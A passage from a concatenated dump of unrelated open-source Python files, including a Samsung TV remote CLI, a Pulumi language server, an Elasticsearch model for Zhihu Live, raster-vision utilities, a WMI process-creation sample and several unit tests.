path = os.path.dirname(sys.argv[0])
if not path:
path = os.getcwd()
sys.path.insert(0, os.path.abspath(os.path.join(path, '..')))
from samsungctl import __doc__ as doc
from samsungctl import __title__ as title
from samsungctl import __version__ as version
from samsungctl import exceptions
from samsungctl import Remote
from samsungctl import key_mappings
from samsungctl.config import Config
def _read_config():
config = collections.defaultdict(
lambda: None,
dict(
name="samsungctl",
description="PC",
id="",
method="legacy",
timeout=0,
)
)
if sys.platform.startswith('win'):
return config
directories = []
xdg_config = os.getenv("XDG_CONFIG_HOME")
if xdg_config:
directories.append(xdg_config)
directories.append(os.path.join(os.getenv("HOME"), ".config"))
directories.append("/etc")
for directory in directories:
pth = os.path.join(directory, "samsungctl.conf")
if os.path.isfile(pth):
config_file = open(pth, 'r')
break
else:
return config
with config_file:
try:
config_json = json.load(config_file)
config.update(config_json)
except ValueError as e:
logging.warning("Could not parse the configuration file.\n %s", e)
return config
def keys_help(keys):
import sys
key_groups = {}
max_len = 0
if not keys or keys == [None]:
keys = key_mappings.KEYS.values()
for key in keys:
if key is None:
continue
group = key.group
key = str(key)
if group not in key_groups:
key_groups[group] = []
if key not in key_groups[group]:
key_groups[group] += [key]
max_len = max(max_len, len(key) - 4)
print('Available keys')
print('=' * (max_len + 4))
print()
print('Note: Key support depends on TV model.')
print()
for group in sorted(list(key_groups.keys())):
print(' ' + group)
print(' ' + ('-' * max_len))
print('\n'.join(key_groups[group]))
print()
sys.exit(0)
def get_key(key):
if key in key_mappings.KEYS:
return key_mappings.KEYS[key]
else:
logging.warning("Warning: Key {0} not found.".format(key))
def main():
epilog = "E.g. %(prog)s --host 192.168.0.10 --name myremote KEY_VOLDOWN"
parser = argparse.ArgumentParser(
prog=title,
description=doc,
epilog=epilog
)
parser.add_argument(
"--version",
action="version",
version="%(prog)s {0}".format(version)
)
parser.add_argument(
"-v",
"--verbose",
action="count",
help="increase output verbosity"
)
parser.add_argument(
"-q",
"--quiet",
action="store_true",
help="suppress non-fatal output"
)
parser.add_argument(
"-i",
"--interactive",
action="store_true",
help="interactive control"
)
parser.add_argument(
"--host",
help="TV hostname or IP address"
)
parser.add_argument(
"--token",
default=None,
help="token for TV's >= 2014"
)
parser.add_argument(
"--port",
type=int,
help="TV port number (TCP)"
)
parser.add_argument(
"--method",
help="Connection method (legacy or websocket)"
)
parser.add_argument(
"--name",
help="remote control name"
)
parser.add_argument(
"--description",
metavar="DESC",
help="remote control description"
)
parser.add_argument(
"--id",
help="remote control id"
)
parser.add_argument(
"--volume",
type=int,
default=None,
help=(
"sets the TV volume to the entered value, a value of -1 will "
"display the volume level"
)
)
parser.add_argument(
"--brightness",
type=int,
default=None,
help=(
"sets the TV brightness level to the entered value, "
"a value of -1 will display the brightness level"
)
)
parser.add_argument(
"--contrast",
type=int,
default=None,
help=(
"sets the TV contrast level to the entered value, "
"a value of -1 will display the contrast level"
)
)
parser.add_argument(
"--sharpness",
type=int,
default=None,
help=(
"sets the TV sharpness level to the entered value, "
"a value of -1 will display the sharpness level"
)
)
parser.add_argument(
"--mute",
type=str,
default=None,
choices=['off', 'on', 'state'],
help=(
"sets the mute on or off (not a toggle), "
"state displays if the mute is on or off"
)
)
parser.add_argument(
"--artmode",
type=str,
default=None,
choices=['off', 'on', 'state'],
help=(
"sets the art mode for Frame TV's, "
"state displays if the art mode is on or off"
)
)
parser.add_argument(
"--source",
type=str,
default=None,
help=(
"changes the input source to the one specified. "
"You can either enter the TV source name "
"eg: HDMI1 HDMI2, USB, PC...."
"or you can enter the programmed label for the source. "
"This is going to be what is displayed on the OSD when you change "
"the source from the remote. If you enter 'state' for the source "
"name it will print out the currently "
"active source label and name."
)
)
parser.add_argument(
"--source-label",
type=str,
default=None,
help=(
"changes the label for a source. "
"If you do not use --source to specify the source to change the "
"label on. It will automatically default to the currently "
"active source. If you set the label to 'state' it will print out "
"the current label for a source if specified using --source or "
"the currently active source"
)
)
parser.add_argument(
"--timeout",
type=float,
help="socket timeout in seconds (0 = no timeout)"
)
parser.add_argument(
"--config-file",
type=str,
default=None,
help="configuration file to load and/or save to"
)
parser.add_argument(
"--start-app",
help="start an application --start-app \"Netflix\""
)
parser.add_argument(
"--app-metadata",
help=(
"pass options string of information the application "
"can use when it starts up. And example would be the browser. "
"To have it open directly to a specific URL you would enter: "
"\"http\/\/www.some-web-address.com\". wrapping the meta data in "
"quotes will reduce the possibility of a command line parser "
"error."
)
)
parser.add_argument(
"--key-help",
action="store_true",
help="print available keys. (key support depends on tv model)"
)
parser.add_argument(
"key",
nargs="*",
default=[],
type=get_key,
help="keys to be sent (e.g. KEY_VOLDOWN)"
)
args = parser.parse_args()
if args.quiet:
log_level = logging.ERROR
elif not args.verbose:
log_level = logging.WARNING
elif args.verbose == 1:
log_level = logging.INFO
else:
log_level = logging.DEBUG
if args.key_help:
keys_help(args.key)
try:
if args.config_file is None:
config = _read_config()
config.update(
{
k: v for k, v in vars(args).items()
if v is not None
}
)
config = Config(**config)
else:
config = {
k: v for k, v in vars(args).items()
if v is not None
}
config = Config.load(args.config_file)(**config)
except exceptions.ConfigError:
import traceback
traceback.print_exc()
return
config.log_level = log_level
if config.upnp_locations is None:
config.upnp_locations = []
try:
with Remote(config) as remote:
if args.interactive:
logging.getLogger().setLevel(logging.ERROR)
from . import interactive
inter = interactive.Interactive(remote)
inter.run()
elif config.method == 'websocket' and args.start_app:
app = remote.get_application(args.start_app)
if args.app_metadata:
app.run(args.app_metadata)
else:
app.run()
else:
for key in args.key:
if key is None:
continue
key(remote)
if args.volume is not None:
if args.volume == -1:
print('Volume:', remote.volume, '%')
else:
remote.volume = args.volume
elif args.mute is not None:
if args.mute == 'state':
print('Mute:', 'ON' if remote.mute else 'OFF')
else:
remote.mute = args.mute == 'on'
elif args.artmode is not None:
if args.artmode == 'state':
print('Art Mode:', 'ON' if remote.artmode else 'OFF')
else:
remote.artmode = args.artmode == 'on'
if args.brightness is not None:
if args.brightness == -1:
print('Brightness:', remote.brightness, '%')
else:
remote.brightness = args.brightness
if args.contrast is not None:
if args.contrast == -1:
print('Contrast:', remote.contrast, '%')
else:
remote.contrast = args.contrast
if args.sharpness is not None:
if args.sharpness == -1:
print('Sharpness:', remote.sharpness, '%')
else:
remote.sharpness = args.sharpness
if args.source_label is not None:
if args.source is None:
if args.source_label == 'state':
print('Source Label:', remote.source.label)
else:
remote.source.label = args.remote_label
else:
for source in remote.sources:
if args.source in (source.label, source.name):
if args.source_label == 'state':
print('Source Label:', source.label)
else:
source.label = args.source_label
break
elif args.source is not None:
if args.source == 'state':
source = remote.source
print(
'Source: Label =', source.label,
'Name =', source.name
)
else:
remote.source = args.source
except exceptions.ConnectionClosed:
logging.error("Error: Connection closed!")
except exceptions.AccessDenied:
logging.error("Error: Access denied!")
except exceptions.ConfigUnknownMethod:
logging.error("Error: Unknown method '{}'".format(config.method))
except socket.timeout:
logging.error("Error: Timed out!")
except OSError as e:
logging.error("Error: %s", e.strerror)
if args.config_file:
config.save()
if __name__ == "__main__":
main()
|
pypy/interpreter/test/test_pycode.py | nanjekyejoannah/pypy | 333 | 11194796 | <reponame>nanjekyejoannah/pypy
from pypy.interpreter.pycode import _code_const_eq
def test_strong_const_equal(space):
# test that the stronger equal that code objects are supposed to use for
# consts works
s = 'Python'
values = [
space.newint(1),
space.newfloat(0.0),
space.newfloat(-0.0),
space.newfloat(1.0),
space.newfloat(-1.0),
space.w_True,
space.w_False,
space.w_None,
space.w_Ellipsis,
space.newcomplex(0.0, 0.0),
space.newcomplex(0.0, -0.0),
space.newcomplex(-0.0, 0.0),
space.newcomplex(-0.0, -0.0),
space.newcomplex(1.0, 1.0),
space.newcomplex(1.0, -1.0),
space.newcomplex(-1.0, 1.0),
space.newcomplex(-1.0, -1.0),
space.newfrozenset(),
space.newtuple([]),
space.newutf8(s, len(s)),
space.newbytes(s),
]
for w_a in values:
assert _code_const_eq(space, w_a, w_a)
assert _code_const_eq(space, space.newtuple([w_a]),
space.newtuple([w_a]))
assert _code_const_eq(space, space.newfrozenset([w_a]),
space.newfrozenset([w_a]))
for w_a in values:
for w_b in values:
if w_a is w_b:
continue
assert not _code_const_eq(space, w_a, w_b)
assert _code_const_eq(space, space.newtuple([w_a, w_b]),
space.newtuple([w_a, w_b]))
assert not _code_const_eq(space, space.newtuple([w_a]),
space.newtuple([w_b]))
assert not _code_const_eq(space, space.newtuple([w_a, w_b]),
space.newtuple([w_b, w_a]))
assert not _code_const_eq(space, space.newfrozenset([w_a]),
space.newfrozenset([w_b]))
s1 = 'Python' + str(1) + str(1)
s2 = 'Python' + str(11)
assert _code_const_eq(space, space.newutf8(s1, len(s1)),
space.newutf8(s2, len(s2)))
assert _code_const_eq(space, space.newbytes(s1),
space.newbytes(s2))
|
hubconf.py | ijonglin/IBN-Net | 744 | 11194797 | dependencies = ['torch']
from ibnnet import resnet18_ibn_a, resnet34_ibn_a, resnet50_ibn_a, resnet101_ibn_a, \
resnet18_ibn_b, resnet34_ibn_b, resnet50_ibn_b, resnet101_ibn_b, \
resnext101_ibn_a, se_resnet101_ibn_a
|
modules/dnn/feathernet/data/fileList.py | zongwave/libxcam | 400 | 11194800 |
# coding: utf-8
# # Use CASIA-SURF training dataset and our private dataset for training
# In[1]:
from pathlib import Path #从pathlib中导入Path
import os
# data_dir = os.getcwd() + '/our_filelist'
# txt_dir=[i for i in list(Path(data_dir).glob("**/2*.txt")) ]#
# Use CASIA-SURF traing data and our private data
# str1 = '/home/zp/disk1T/CASIASURF/data'
# str2 = os.getcwd()
# str3 = '/home/zp/disk1T/TSNet-LW/data'
# for i in range(len(txt_dir)):
# s = str(txt_dir[i]).replace('[','').replace(']','')#去除[],这两行按数据不同,可以选择
# s2 = s.replace("'",'').replace('our_filelist','')
# fp = open(s2,'w')
# with open(s,'r') as f:
# lines = f.read().splitlines()
# for i in lines:
# i = i.replace(str1,str2)
# i = i.replace(str3,str2)
# fp.write( i + '\n')
# fp.close()
# # Use CASIA-SURF Val data for val
# Use CASIA-SURF training data for training
import fileinput
rgb = open('./rgb_train.txt','a')
depth = open('./depth_train.txt','a')
ir = open('./ir_train.txt','a')
label = open('./label_train.txt','a')
pwd = os.getcwd() +'/'# the val data path
for line in fileinput.input("train_list.txt"):
list = line.split(' ')
rgb.write(pwd +list[0]+'\n')
depth.write(pwd +list[1]+'\n')
ir.write(pwd +list[2]+'\n')
label.write(list[3])
rgb.close()
depth.close()
ir.close()
label.close()
import fileinput
rgb = open('./rgb_val.txt','a')
depth = open('./depth_val.txt','a')
ir = open('./ir_val.txt','a')
label = open('./label_val.txt','a')
pwd = os.getcwd() +'/'# the val data path
for line in fileinput.input("val_private_list.txt"):
list = line.split(' ')
rgb.write(pwd +list[0]+'\n')
depth.write(pwd +list[1]+'\n')
ir.write(pwd +list[2]+'\n')
label.write(list[3])
rgb.close()
depth.close()
ir.close()
label.close()
# Use CASIA-SURF Test data for test
# To make it easier for you to test, prepare the label for the test set.
import fileinput
rgb = open('./rgb_test.txt','a')
depth = open('./depth_test.txt','a')
ir = open('./ir_test.txt','a')
label = open('./label_test.txt','a')
pwd = os.getcwd() +'/'# the val data path
for line in fileinput.input("test_private_list.txt"):
list = line.split(' ')
rgb.write(pwd +list[0]+'\n')
depth.write(pwd +list[1]+'\n')
ir.write(pwd +list[2]+'\n')
label.write(list[3])
rgb.close()
depth.close()
ir.close()
label.close()
# In test phase,we use the IR data for training
# replace '/home/zp/disk1T/libxcam-testset/'
f = open('ir_final_train.txt','w')
ir_file = 'ir_final_train_tmp.txt'
s = '/home/zp/disk1T/libxcam-testset/data'
import os
dir_pwd = os.getcwd()
with open(ir_file,'r') as fp:
lines = fp.read().splitlines()
for line in lines:
line = line.replace(s,dir_pwd)
f.write(line + '\n')
f.close() |
ufora/core/math/Color.py | ufora/ufora | 571 | 11194851 | <gh_stars>100-1000
# Copyright 2015 Ufora Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy
def hsl_to_rgb(h,s,l):
q = l * (1.0 + s) * (l < .5) + (l + s - l * s) * (l >= .5)
p = 2 * l - q
h = h - numpy.floor(h)
t = [h + 1.0 / 3.0, h, h - 1.0 / 3.0]
for ix in range(3):
t[ix] -= numpy.floor(t[ix])
t[ix] = ((p + 6 * (q - p) * t[ix]) * (t[ix] < 1.0 / 6.0)
+ q * (t[ix] >= 1.0 / 6.0) * (t[ix] < 3.0 / 6.0)
+ (p + 6 * (q - p) * (2.0 / 3.0 - t[ix]) ) * (t[ix] >= 3.0 / 6.0) * (t[ix] < 5.0 / 6.0)
+ p * (t[ix] >= 5.0 / 6.0))
return t[0],t[1],t[2]
def hsv_to_rgb(h,s,v):
f = (h - numpy.floor(h)) * 6.0
hi = numpy.floor(f)
f -= hi
p = v * (1 - s)
q = v * (1 - f * s)
t = v * (1 - (1 - f) * s)
hi = hi.astype(int)
r = v * (hi == 0) + q * (hi == 1) + p * (hi == 2) + p * (hi == 3) + t * (hi == 4) + v * (hi == 5)
g = t * (hi == 0) + v * (hi == 1) + v * (hi == 2) + q * (hi == 3) + p * (hi == 4) + p * (hi == 5)
b = p * (hi == 0) + p * (hi == 1) + t * (hi == 2) + v * (hi == 3) + v * (hi == 4) + q * (hi == 5)
return r,g,b
|
sdk/python/lib/pulumi/automation/_server.py | pcen/pulumi | 12,004 | 11194858 | <reponame>pcen/pulumi<filename>sdk/python/lib/pulumi/automation/_server.py<gh_stars>1000+
# Copyright 2016-2021, Pulumi Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import sys
import traceback
from contextlib import suppress
import grpc
from ._workspace import PulumiFn
from .. import log
from ..runtime.proto import language_pb2, plugin_pb2, LanguageRuntimeServicer
from ..runtime import run_in_stack, reset_options, set_all_config
from ..errors import RunError
_py_version_less_than_3_7 = sys.version_info[0] == 3 and sys.version_info[1] < 7
class LanguageServer(LanguageRuntimeServicer):
program: PulumiFn
def __init__(self, program: PulumiFn) -> None:
self.program = program # type: ignore
@staticmethod
def on_pulumi_exit():
# Reset globals
reset_options()
def GetRequiredPlugins(self, request, context):
return language_pb2.GetRequiredPluginsResponse()
def Run(self, request, context):
# Configure the runtime so that the user program hooks up to Pulumi as appropriate.
engine_address = request.args[0] if request.args else ""
reset_options(
project=request.project,
monitor_address=request.monitor_address,
engine_address=engine_address,
stack=request.stack,
parallel=request.parallel,
preview=request.dryRun
)
if request.config:
secret_keys = request.configSecretKeys if request.configSecretKeys else None
set_all_config(request.config, secret_keys)
# The strategy here is derived from sdk/python/cmd/pulumi-language-python-exec
result = language_pb2.RunResponse()
loop = asyncio.new_event_loop()
try:
loop.run_until_complete(run_in_stack(self.program))
except RunError as exn:
msg = str(exn)
log.error(msg)
result.error = str(msg)
return result
except grpc.RpcError as exn:
# If the monitor is unavailable, it is in the process of shutting down or has already
# shut down. Don't emit an error if this is the case.
# pylint: disable=no-member
if exn.code() == grpc.StatusCode.UNAVAILABLE:
log.debug("Resource monitor has terminated, shutting down.")
else:
msg = f"RPC error: {exn.details()}"
log.error(msg)
result.error = msg
return result
except Exception as exn:
msg = str(f"python inline source runtime error: {exn}\n{traceback.format_exc()}")
log.error(msg)
result.error = msg
return result
finally:
# If there's an exception during `run_in_stack`, it may result in pending asyncio tasks remaining unresolved
# at the time the loop is closed, which results in a `Task was destroyed but it is pending!` error being
# logged to stdout. To avoid this, we collect all the unresolved tasks in the loop and cancel them before
# closing the loop.
pending = asyncio.Task.all_tasks(loop) if _py_version_less_than_3_7 else asyncio.all_tasks(loop) # pylint: disable=no-member
log.debug(f"Cancelling {len(pending)} tasks.")
for task in pending:
task.cancel()
with suppress(asyncio.CancelledError):
loop.run_until_complete(task)
loop.close()
sys.stdout.flush()
sys.stderr.flush()
return result
def GetPluginInfo(self, request, context):
return plugin_pb2.PluginInfo()
|
project/tests/test_view_sql_detail.py | eduzen/django-silk | 2,027 | 11194878 | <gh_stars>1000+
import random
from django.conf import settings
from django.test import TestCase
from silk.config import SilkyConfig
from silk.middleware import silky_reverse
from silk.views.sql_detail import SQLDetailView
from .test_lib.mock_suite import MockSuite
class TestViewSQLDetail(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
SilkyConfig().SILKY_AUTHENTICATION = False
SilkyConfig().SILKY_AUTHORISATION = False
def test_allowed_file_paths_nothing_specified(self):
"""by default we dont display any source, and it should return correctly"""
request = MockSuite().mock_request()
query = MockSuite().mock_sql_queries(request=request, n=1)[0]
response = self.client.get(silky_reverse('request_sql_detail', kwargs={'sql_id': query.id, 'request_id': request.id}))
self.assertTrue(response.status_code == 200)
def test_allowed_file_paths_available_source(self):
"""if we request to view source that exists in the TB all should be fine"""
request = MockSuite().mock_request()
query = MockSuite().mock_sql_queries(request=request, n=1)[0]
tb = query.traceback_ln_only
_, files = SQLDetailView()._urlify(tb)
file_path = random.choice(files)
with open(file_path) as f:
line_num = random.randint(0, len(f.read().split('\n')))
response = self.client.get(silky_reverse('request_sql_detail',
kwargs={'sql_id': query.id, 'request_id': request.id}),
data={
'line_num': line_num,
'file_path': file_path
})
self.assertTrue(response.status_code == 200)
def test_allowed_file_paths_unavailable_source(self):
"""if we request to view source that is not in the traceback we should get a 403"""
request = MockSuite().mock_request()
query = MockSuite().mock_sql_queries(request=request, n=1)[0]
file_path = settings.TEMP_DIR + '/blah'
with open(file_path, 'w') as f:
f.write('test')
response = self.client.get(silky_reverse('request_sql_detail',
kwargs={'sql_id': query.id, 'request_id': request.id}),
data={
'line_num': 0,
'file_path': file_path
})
self.assertTrue(response.status_code == 403)
|
common/src/stack/command/stack/commands/add/host/storage/partition/__init__.py | anooprajendra/stacki | 123 | 11194887 | <gh_stars>100-1000
# @copyright@
# Copyright (c) 2006 - 2019 Teradata
# All rights reserved. Stacki(r) v5.x stacki.com
# https://github.com/Teradata/stacki/blob/master/LICENSE.txt
# @copyright@
import stack.commands
from stack.exception import ArgRequired
class Command(stack.commands.add.host.command):
"""
Add a storage partition configuration for the specified hosts.
<arg type='string' name='host' repeat='1' optional='0'>
Host name of machine
</arg>
<param type='string' name='device' optional='0'>
Disk device on which we are creating partitions
</param>
<param type='string' name='mountpoint' optional='1'>
Mountpoint to create
</param>
<param type='integer' name='size' optional='0'>
Size of the partition.
</param>
<param type='string' name='type' optional='1'>
Type of partition E.g: ext4, ext3, xfs, raid, etc.
</param>
<param type='string' name='options' optional='1'>
Options that need to be supplied while adding partitions.
</param>
<param type='integer' name='partid' optional='1'>
The relative partition id for this partition. Partitions will be
created in ascending partition id order.
</param>
<example cmd='add host storage partition backend-0-0 device=sda mountpoint=/var size=50 type=ext4'>
Creates a ext4 partition on device sda with mountpoints /var.
</example>
"""
def run(self, params, args):
if len(args) == 0:
raise ArgRequired(self, 'host')
self.command('add.storage.partition', self._argv + ['scope=host'], verbose_errors = False)
return self.rc
|
Server/models/live.py | qinXpeng/weapp-zhihulive | 381 | 11194907 | # coding=utf-8
from datetime import date, timedelta
from elasticsearch_dsl import (
DocType, Date, Integer, Text, Float, Boolean, Keyword, SF, Q, A,
Completion, Long)
from elasticsearch_dsl.connections import connections
from elasticsearch_dsl.analysis import CustomAnalyzer
from config import SEARCH_FIELDS, LIVE_URL
from .speaker import User, session
from .topic import Topic
connections.create_connection(hosts=['localhost'])
gauss_sf = SF('gauss', starts_at={
'origin': 'now', 'offset': '7d', 'scale': '10d'
})
log_sf = SF('script_score', script={
'lang': 'painless',
'inline': ("Math.log10(doc['seats_taken'].value * doc['amount'].value) * "
"doc['feedback_score'].value")
})
ik_analyzer = CustomAnalyzer(
'ik_analyzer', tokenizer='ik_max_word',
filter=['lowercase']
)
class Live(DocType):
id = Long()
speaker_id = Integer()
speaker_name = Text(analyzer='ik_max_word')
feedback_score = Float() # 评分
topic_names = Text(analyzer='ik_max_word') # 话题标签名字
seats_taken = Integer() # 参与人数
subject = Text(analyzer='ik_max_word') # 标题
amount = Float() # 价格(RMB)
description = Text(analyzer='ik_max_word')
status = Boolean() # public(True)/ended(False)
starts_at = Date()
outline = Text(analyzer='ik_max_word') # Live内容
speaker_message_count = Integer()
tag_names = Text(analyzer='ik_max_word')
liked_num = Integer()
topics = Keyword()
live_suggest = Completion(analyzer=ik_analyzer)
cover = Text(index='not_analyzed')
zhuanlan_url = Text(index='not_analyzed')
@property
def id(self):
return self._id
@property
def speaker(self):
return session.query(User).get(self.speaker_id)
@property
def url(self):
return LIVE_URL.format(self.id)
class Meta:
index = 'live130'
def to_dict(self, include_extended=True):
d = super().to_dict()
if include_extended:
d.update({
'id': self._id,
'type': 'live',
'speaker': self.speaker.to_dict(),
'url': self.url
})
return d
@classmethod
async def add(cls, **kwargs):
id = kwargs.pop('id', None)
if id is None:
return False
live = cls(meta={'id': int(id)}, **kwargs)
await live.save()
return live
@classmethod
async def _execute(cls, s, order_by=None):
if order_by is not None:
s = s.sort(order_by)
lives = await s.execute()
return [live.to_dict() for live in lives]
@classmethod
def apply_weight(cls, s, start, limit):
return s.query(Q('function_score', functions=[gauss_sf, log_sf])).extra(
**{'from': start, 'size': limit})
@classmethod
async def ik_search(cls, query, status=None, start=0, limit=10):
s = cls.search()
s = s.query('multi_match', query=query,
fields=SEARCH_FIELDS)
if status is not None:
s = s.query('match', status=status)
s = cls.apply_weight(s, start, limit)
return await cls._execute(s)
@classmethod
async def explore(cls, from_date=None, to_date=None, order_by=None,
start=0, limit=10, topic=None):
s = cls.search()
if topic is not None:
s = s.query(Q('term', topic_names=topic))
starts_at = {}
if from_date is not None:
starts_at['from'] = from_date
if to_date is not None:
starts_at['to'] = to_date
if starts_at:
s = s.query(Q('range', starts_at=starts_at))
if order_by is None:
s = cls.apply_weight(s, start, limit)
return await cls._execute(s, order_by)
@classmethod
async def get_hot_weekly(cls):
today = date.today()
return await cls.explore(from_date=today - timedelta(days=7),
to_date=today, limit=20)
@classmethod
async def get_hot_monthly(cls):
today = date.today()
return await cls.explore(from_date=today - timedelta(days=30),
to_date=today, limit=50)
@classmethod
async def ik_search_by_speaker_id(cls, speaker_id, order_by='-starts_at'):
s = cls.search()
s = s.query(Q('bool', should=Q('match', speaker_id=speaker_id)))
return await cls._execute(s, order_by)
@classmethod
async def get_hot_topics(cls, size=50):
s = cls.search()
s.aggs.bucket('topics', A('terms', field='topics', size=size))
rs = await s.execute()
buckets = rs.aggregations.topics.buckets
topic_names = [r['key'] for r in buckets]
topics = session.query(Topic).filter(Topic.name.in_(topic_names)).all()
topics = sorted(topics, key=lambda t: topic_names.index(t.name))
return [topic.to_dict() for topic in topics]
@classmethod
async def ik_suggest(cls, query, size=10):
s = cls.search()
s = s.suggest('live_suggestion', query, completion={
'field': 'live_suggest', 'fuzzy': {'fuzziness': 2}, 'size': size
})
suggestions = await s.execute_suggest()
matches = suggestions.live_suggestion[0].options
ids = [match._id for match in matches]
if not ids:
return []
lives = await Live.mget(ids)
return [live.to_dict() for live in lives]
async def init():
await Live.init()
|
samples/wmi/create_process.py | IMULMUL/PythonForWindows | 479 | 11194920 | import time
import windows
wmispace = windows.system.wmi["root\\cimv2"]
print("WMI namespace is <{0}>".format(wmispace))
proc_class = wmispace.get_object("Win32_process")
print("Process class is {0}".format(proc_class))
inparam_cls = proc_class.get_method("Create").inparam
print("Method Create InParams is <{0}>".format(inparam_cls))
print("Method Create InParams properties are <{0}>".format(inparam_cls.properties))
print("Creating instance of inparam")
inparam = inparam_cls()
print("InParam instance is <{0}>".format(inparam))
print("Setting <CommandLine>")
inparam["CommandLine"] = r"c:\windows\system32\notepad.exe"
print("Executing method")
# This API may change for something that better wraps cls/object/Parameters handling
outparam = wmispace.exec_method(proc_class, "Create", inparam)
print("OutParams is {0}".format(outparam))
print("Out params values are: {0}".format(outparam.properties))
target = windows.WinProcess(pid=int(outparam["ProcessId"]))
print("Created process is {0}".format(target))
print("Waiting 1s")
time.sleep(1)
print("Killing the process")
target.exit(0)
|
rastervision_pytorch_backend/rastervision/pytorch_backend/examples/utils.py | theoway/raster-vision | 1,577 | 11194945 | from typing import List, Optional
import csv
from io import StringIO
import os
from pathlib import Path
from tempfile import TemporaryDirectory
import rasterio
from shapely.strtree import STRtree
from shapely.geometry import shape, mapping
from shapely.ops import transform
from rastervision.core import Box
from rastervision.core.data import (RasterioCRSTransformer,
GeoJSONVectorSourceConfig)
from rastervision.core.utils.stac import parse_stac
from rastervision.pipeline.file_system import (
file_to_str, file_exists, get_local_path, upload_or_copy, make_dir,
json_to_file, download_if_needed, unzip)
from rastervision.aws_s3 import S3FileSystem
def str_to_bool(x):
if type(x) == str:
if x.lower() == 'true':
return True
elif x.lower() == 'false':
return False
else:
raise ValueError('{} is expected to be true or false'.format(x))
return x
def get_scene_info(csv_uri):
csv_str = file_to_str(csv_uri)
reader = csv.reader(StringIO(csv_str), delimiter=',')
return list(reader)
def crop_image(image_uri, window, crop_uri):
im_dataset = rasterio.open(image_uri)
rasterio_window = window.rasterio_format()
im = im_dataset.read(window=rasterio_window)
with TemporaryDirectory() as tmp_dir:
crop_path = get_local_path(crop_uri, tmp_dir)
make_dir(crop_path, use_dirname=True)
meta = im_dataset.meta
meta['width'], meta['height'] = window.get_width(), window.get_height()
meta['transform'] = rasterio.windows.transform(rasterio_window,
im_dataset.transform)
with rasterio.open(crop_path, 'w', **meta) as dst:
dst.colorinterp = im_dataset.colorinterp
dst.write(im)
upload_or_copy(crop_path, crop_uri)
def save_image_crop(image_uri,
image_crop_uri,
label_uri=None,
label_crop_uri=None,
size=600,
min_features=10,
vector_labels=True,
class_config=None):
"""Save a crop of an image to use for testing.
If label_uri is set, the crop needs to cover >= min_features.
Args:
image_uri: URI of original image
image_crop_uri: URI of cropped image to save
label_uri: optional URI of label file
label_crop_uri: optional URI of cropped labels to save
size: height and width of crop
Raises:
ValueError if cannot find a crop satisfying min_features constraint.
"""
if not file_exists(image_crop_uri):
print('Saving test crop to {}...'.format(image_crop_uri))
old_environ = os.environ.copy()
try:
request_payer = S3FileSystem.get_request_payer()
if request_payer == 'requester':
os.environ['AWS_REQUEST_PAYER'] = request_payer
im_dataset = rasterio.open(image_uri)
h, w = im_dataset.height, im_dataset.width
extent = Box(0, 0, h, w)
windows = extent.get_windows(size, size)
if label_uri and vector_labels:
crs_transformer = RasterioCRSTransformer.from_dataset(
im_dataset)
geojson_vs_config = GeoJSONVectorSourceConfig(
uri=label_uri, default_class_id=0, ignore_crs_field=True)
vs = geojson_vs_config.build(class_config, crs_transformer)
geojson = vs.get_geojson()
geoms = []
for f in geojson['features']:
g = shape(f['geometry'])
geoms.append(g)
tree = STRtree(geoms)
def p2m(x, y, z=None):
return crs_transformer.pixel_to_map((x, y))
for w in windows:
use_window = True
if label_uri and vector_labels:
w_polys = tree.query(w.to_shapely())
use_window = len(w_polys) >= min_features
if use_window and label_crop_uri is not None:
print('Saving test crop labels to {}...'.format(
label_crop_uri))
label_crop_features = [
mapping(transform(p2m, wp)) for wp in w_polys
]
label_crop_json = {
'type':
'FeatureCollection',
'features': [{
'geometry': f
} for f in label_crop_features]
}
json_to_file(label_crop_json, label_crop_uri)
if use_window:
crop_image(image_uri, w, image_crop_uri)
if not vector_labels and label_uri and label_crop_uri:
crop_image(label_uri, w, label_crop_uri)
break
if not use_window:
raise ValueError('Could not find a good crop.')
finally:
os.environ.clear()
os.environ.update(old_environ)
def read_stac(uri: str, unzip_dir: Optional[str] = None) -> List[dict]:
"""Parse the contents of a STAC catalog (downloading it first, if
remote). If the uri is a zip file, unzip it, find catalog.json inside it
and parse that.
Args:
uri (str): Either a URI to a STAC catalog JSON file or a URI to a zip
file containing a STAC catalog JSON file.
Raises:
FileNotFoundError: If catalog.json is not found inside the zip file.
Exception: If multiple catalog.json's are found inside the zip file.
Returns:
List[dict]: A lsit of dicts with keys: "label_uri", "image_uris",
"label_bbox", "image_bbox", "bboxes_intersect", and "aoi_geometry".
Each dict corresponds to one label item and its associated image
assets in the STAC catalog.
"""
uri_path = Path(uri)
is_zip = uri_path.suffix.lower() == '.zip'
with TemporaryDirectory() as tmp_dir:
catalog_path = download_if_needed(uri, tmp_dir)
if not is_zip:
return parse_stac(catalog_path)
if unzip_dir is None:
raise ValueError(
f'uri ("{uri}") is a zip file, but no unzip_dir provided.')
zip_path = catalog_path
unzip(zip_path, target_dir=unzip_dir)
catalog_paths = list(Path(unzip_dir).glob('**/catalog.json'))
if len(catalog_paths) == 0:
raise FileNotFoundError(f'Unable to find "catalog.json" in {uri}.')
elif len(catalog_paths) > 1:
raise Exception(f'More than one "catalog.json" found in '
f'{uri}.')
catalog_path = str(catalog_paths[0])
return parse_stac(catalog_path)
|
numba/roc/tests/hsapy/test_reduction.py | mawanda-jun/numba | 1,738 | 11194954 | from __future__ import print_function, absolute_import, division
import numpy as np
from numba import unittest_support as unittest
from numba import roc, intp
WAVESIZE = 64
@roc.jit(device=True)
def wave_reduce(val):
tid = roc.get_local_id(0)
laneid = tid % WAVESIZE
width = WAVESIZE // 2
while width:
if laneid < width:
val[laneid] += val[laneid + width]
val[laneid + width] = -1 # debug
roc.wavebarrier()
width = width // 2
# First thread has the result
roc.wavebarrier()
return val[0]
@roc.jit
